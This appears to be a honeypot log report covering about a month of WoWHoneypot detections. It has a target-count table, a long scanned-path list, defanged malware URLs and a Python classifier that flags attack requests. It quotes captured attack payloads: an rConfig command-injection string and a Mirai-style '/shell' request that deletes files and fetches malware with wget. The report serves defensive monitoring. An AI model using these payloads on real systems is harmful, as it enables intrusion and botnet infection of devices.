[Honeypot quick analysis] Quick honeypot analysis (10/11-11/16)
It has been quite a while since the last update.
Due to a mistake on my part, part of the logs went missing: the WoWHoneypot and Honeytrap logs were lost, so this update covers WoWHoneypot only.
◾️WoWHoneypot
<Detections by country and detection counts>
※ Quite a long period was lost because of a log import mistake...
<Detected paths (count by target)>
target | count |
--- | --- |
WordPress | 1639 |
- | 876 |
FreePBX | 438 |
txt | 116 |
Admin config | 113 |
Tomcat | 76 |
phpMyAdmin | 43 |
ThinkPHP | 41 |
Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API | 32 |
Unauthorized Relay | 14 |
Webshell | 11 |
phpMyAdmin | 10 |
a2billing | 8 |
Nmap | 7 |
D-Link DIR-850L | 3 |
consul | 3 |
Vmware | 2 |
.env file | 1 |
ASUS | 1 |
Drupal | 1 |
IPC | 1 |
Login Page | 1 |
MySQL | 1 |
Outlook 2016 Autodiscover | 1 |
Scannero | 1 |
Trane Tracer SC | 1 |
rConfig | 1 |
<rConfig vulnerability>
CVE-2019-16663 and CVE-2019-16662
Detected payload
/install/lib/ajaxhandlers/ajaxserversettingschk.php?rootuname=;echo -n hellorconfig|md5sum #
→ The payload after rootuname=; is executed. The command seen here uses echo to obtain the md5 hash of the string hellorconfig. A returned hash means the injection succeeded, so when the hash is displayed the attacker presumably moves on to the next stage of the attack.
<Malware downloads>
hxxp://fky[.]dfg45dfg45[.]best/download[.]exe
https://www.virustotal.com/gui/file/7ee4f2381f5e06e3808455bec411ba1735688ee9269ce74d1ef1cd9fa0bee95f/detection
→ Downloader
Request: GET /FxCodeShell.jsp
An attack aimed at having a downloader installed through a webshell.
hxxp://5[.]206[.]227[.]65/arm7[.]tsunami
https://www.virustotal.com/gui/file/4a3e9fd386272aadc1d15157cad96db4ed1c41ef44f28b04eea4310dd4ae4439/detection
→ Mirai variant (tsunami)
Request: GET /shell?cd+/tmp;rm+-rf+.t;wget [malware URL]
This traffic targets IoT devices such as MVPower DVRs and aims at infecting them with a Mirai variant. (As usual, the IoT-related hits are dominated by Mirai-family downloads...)
<Detected path list>
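As an added example that is not part of the original post, the following Python classifier shows how the request shapes discussed above (the rConfig rootuname command-injection probe, the /shell fetch-and-run command aimed at IoT devices, webshell paths and proxy-relay attempts) can be flagged when reading WoWHoneypot-style request lines. The sample request lines, the malware.invalid host and the label names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample request lines modelled on the request shapes in this report
# (the malware.invalid host is a placeholder, not a real download URL)
SAMPLE_REQUESTS = [
    "GET /install/lib/ajaxhandlers/ajaxserversettingschk.php?rootuname=;echo -n hellorconfig|md5sum #",
    "GET /install/lib/ajaxhandlers/ajaxserversettingschk.php?rootuname=admin",
    "GET /shell?cd+/tmp;rm+-rf+.t;wget+http://malware.invalid/arm7.tsunami",
    "GET /FxCodeShell.jsp",
    "GET http://www.ip.cn/",
    "CONNECT www.baidu.com:443",
    "GET /wp-login.php",
]

SHELL_META = re.compile(r"[;|&`]|\$\(")               # command separators / substitution
DOWNLOADER = re.compile(r"\b(wget|curl|tftp)\b")      # fetch-and-run pattern seen on IoT hits
WEBSHELLS = {"/FxCodeShell.jsp", "/l.php", "/shell"}  # webshell paths from the table

def query_values(query):
    """Decode each query value; '+' is a space in these payloads and a
    fragment with no '=' (as in /shell?cd+/tmp;...) is treated as one value."""
    for pair in query.split("&"):
        value = pair.partition("=")[2] if "=" in pair else pair
        yield unquote_plus(value)

def classify(request_line):
    method, _, target = request_line.partition(" ")
    # CONNECT or an absolute URL as target: the honeypot is being used as a proxy
    if method == "CONNECT" or target.startswith(("http://", "https://")):
        return "unauthorized-relay"
    parts = urlsplit(target)
    values = list(query_values(parts.query))
    if parts.path.endswith("ajaxserversettingschk.php") and any(SHELL_META.search(v) for v in values):
        return "rconfig-command-injection"  # CVE-2019-16663 / CVE-2019-16662 probe
    if any(SHELL_META.search(v) and DOWNLOADER.search(v) for v in values):
        return "iot-download-command"       # Mirai-style fetch via /shell
    if parts.path in WEBSHELLS:
        return "webshell-probe"
    return "other"

def summarize(lines):
    """Count requests per label, e.g. for a periodic detection summary."""
    counts = {}
    for line in lines:
        label = classify(line)
        counts[label] = counts.get(label, 0) + 1
    return counts

if __name__ == "__main__":
    for label, n in sorted(summarize(SAMPLE_REQUESTS).items()):
        print(f"{label}: {n}")
```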
path | target | CVE | reference | count |
--- | --- | --- | --- | --- |
/editBlackAndWhiteList | Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API | - | https://github.com/mcw0/PoC/blob/master/TVT-PoC.py | 8 |
/myadmin/scripts/setup.php | phpMyAdmin | - | - | 8 |
/pma/scripts/setup.php | phpMyAdmin | - | - | 8 |
/recordings/theme/main.css | FreePBX | - | - | 4 |
/recordings/theme/main.css | FreePBX | - | https://github.com/crazedr0m/FreePBX/blob/master/upgrades/2.8.1.md5 | 4 |
/admin/i18n/readme.txt | - | - | - | 2 |
/admin/i18n/readme.txt | txt | - | - | 2 |
/ | - | - | - | 1 |
/ index.php | - | - | - | 1 |
/ l.php | Webshell | - | - | 1 |
/ phpinfo.php | - | - | - | 1 |
/.env | .env file | - | - | 1 |
/// | - | - | - | 1 |
///wp-json/wp/v2/users/ | WordPress | - | - | 1 |
//MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
//myadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
//phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
//phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
//pma/scripts/setup.php | phpMyAdmin | - | - | 1 |
/Autodiscover/Autodiscover.xml | Outlook 2016 Autodiscover | - | - | 1 |
/FxCodeShell.jsp | Webshell | - | - | 1 |
/HNAP1 | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
/HNAP1/ | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
/Login.htm | - | - | - | 1 |
/MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/Nmap/folder/check1573311458 | Nmap | - | - | 1 |
/Nmap/folder/check1573531681 | Nmap | - | - | 1 |
/NmapUpperCheck1573311458 | Nmap | - | - | 1 |
/NmapUpperCheck1573531681 | Nmap | - | - | 1 |
/Pages/login.htm | - | - | - | 1 |
/TP/public/index.php | ThinkPHP | - | - | 1 |
/a2billing/admin/Public/index.php | a2billing | - | http://www.asterisk2billing.org/ | 1 |
/a2billing/customer/templates/default/css/menu.css | FreePBX | - | https://n-lab.site/?p=494 | 1 |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 1 |
/admin/config.php | Admin config | - | - | 1 |
/admin/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/admin/pma/scripts/setup.php | phpMyAdmin | - | - | 1 |
/admin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/cgi-sys/defaultwebpage.cgi | - | - | - | 1 |
/cpanel | - | - | - | 1 |
/db/scripts/setup.php | phpMyAdmin | - | - | 1 |
/dbadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/evox/about | Trane Tracer SC | - | https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327 | 1 |
/favicon.ico | - | - | - | 1 |
/get_webdavInfo.asp | ASUS RT-AC | CVE-2017-5892 | https://wwwsnightwatchcybersecuritycom.files.wordpress.com/2017/10/bsides_fall_2017.pdf | 1 |
/getip | - | - | - | 1 |
/index.php | - | - | - | 1 |
/install/lib/ajaxhandlers/ajaxserversettingschk.php | rConfig | CVE-2019-16663, CVE-2019-16662 | https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ | 1 |
/ipc$ | IPC | - | https://thinline196.hatenablog.com/entry/2018/09/23/153019 | 1 |
/l.php | Webshell | - | - | 1 |
/login/ | Login Page | - | - | 1 |
/manager/html | Tomcat | - | - | 1 |
/manager/text/list | Tomcat | - | https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html | 1 |
/muieblackcat | Scanner | - | https://eromang.zataz.com/2011/08/14/suc027-muieblackcat-setup-php-web-scanner-robot/ | 1 |
/mysql/scripts/setup.php | MySQL | - | - | 1 |
/mysqladmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/nice ports,/Trinity.txt.bak | Nmap | - | https://dragos.com/blog/industry-news/threat-hunting-with-python-part-2-detecting-nmap-behavior-with-bro-http-logs/ | 1 |
/nmaplowercheck1573311458 | Nmap | - | - | 1 |
/nmaplowercheck1573531681 | Nmap | - | - | 1 |
/phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/phpinfo.php | - | - | - | 1 |
/phpmyadmin | phpMyAdmin | - | - | 1 |
/phpmyadmin/ | phpMyAdmin | - | - | 1 |
/phpmyadmin/ index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin// index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin// l.php | phpMyAdmin | - | - | 1 |
/phpmyadmin// phpinfo.php | phpMyAdmin | - | - | 1 |
/phpmyadmin//index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin//l.php | phpMyAdmin | - | - | 1 |
/phpmyadmin//phpinfo.php | phpMyAdmin | - | - | 1 |
/phpmyadmin//phpmyadmin/ index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin//phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
/pmd/ index.php | phpMyAdmin | - | - | 1 |
/pmd/index.php | phpMyAdmin | - | - | 1 |
/robots.txt | - | - | - | 1 |
/scripts/setup.php | phpMyAdmin | - | - | 1 |
/sdk | Vmware | - | https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse | 1 |
/shell | Webshell | - | - | 1 |
/user/register/ | Drupal | CVE-2018-7600 | https://www.orangeitems.com/entry/2018/04/14/084205 | 1 |
/v1/agent/self | consul | - | https://github.com/hashicorp/consul/blob/master/api/agent.go | 1 |
/w00tw00t.at.blackhats.romanian.anti-sec:) | phpMyAdmin | - | - | 1 |
/wp-admin/ | WordPress | - | - | 1 |
/wp-login.php | WordPress | - | - | 1 |
/xmlrpc.php | WordPress | - | - | 1 |
cn.bing.com:443 | Unauthorized Relay | - | - | 1 |
hxxp://112[.]124.42.80:63435/ | Unauthorized Relay | - | - | 1 |
hxxp://112[.]35.63.31:8088/index.php | Unauthorized Relay | - | - | 1 |
hxxp://112[.]35.66.7:8088/index.php | Unauthorized Relay | - | - | 1 |
hxxp://123[.]125.114.144/ | Unauthorized Relay | - | - | 1 |
hxxp://www.123cha.com/ | Unauthorized Relay | - | - | 1 |
hxxp://www.ip.cn/ | Unauthorized Relay | - | - | 1 |
www[.]baidu.com:443 | Unauthorized Relay | - | - | 1 |
www[.]ip.cn:443 | Unauthorized Relay | - | - | 1 |
xui[.]ptlogin2.qq.com:443 | Unauthorized Relay | - | - | 1 |
That is all for this time.